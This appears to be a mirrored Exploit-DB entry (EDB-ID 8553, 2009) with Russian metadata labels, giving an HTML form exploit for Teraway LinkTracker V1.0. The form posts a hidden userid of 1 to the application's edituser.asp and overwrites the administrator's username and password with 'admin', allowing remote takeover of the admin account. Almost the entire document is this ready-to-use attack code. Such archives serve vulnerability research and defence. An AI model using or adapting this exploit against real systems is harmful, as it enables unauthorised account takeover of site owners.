- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8553
- Проверка EDB
-
- Пройдено
- Автор
- THE G0BL!N
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-04-27
HTML:
<title>Teraway LinkTracker V1.0 Remote Password Change</title>
<form name="form1" method="post" action="http://www.teraway.com/linktracker/demo/edituser.asp">
<table width="90%" border="0" cellspacing="2" cellpadding="2" align="center">
<tr>
<td class="Titles">Cod[3]d By ThE g0bL!N Fi Khater Cristal wa x.CJP.x :)</td>
<input type="hidden" name="userid" value="1">
</td>
</tr>
<tr>
<td colspan="2" bgcolor="#666666"></td>
</tr>
<tr align="left" valign="top" class="optionname">
<td width="200"><b>Name :</b></td>
</tr>
<tr align="left" valign="top" class="optionname">
<td width="200"><b>E-mail :</b></td>
<td> <input type="text" name="email" size="40" value="[email protected]" maxlength="250">
</td>
</tr>
<tr align="left" valign="top" class="optionname">
<td width="200"><b>Username :</b></td>
<td> <input type="text" name="usr" size="40" value="admin" maxlength="250">
</td>
</tr>
<tr align="left" valign="top" class="optionname">
<td width="200"><b>Password :</b></td>
<td> <input type="password" name="pwd" size="40" value="admin" maxlength="250">
</td>
</tr>
</td>
</tr>
<tr class="optionname">
<td width="200"> </td>
<td> <input name="button" type="submit" class="generalText" value="Save User" onclick="alerta();">
</td>
</tr>
<tr>
<td colspan="2" bgcolor="#666666"></td>
</tr>
</table>
</form>
</body>
</html>
# milw0rm.com [2009-04-27]
- Источник
- www.exploit-db.com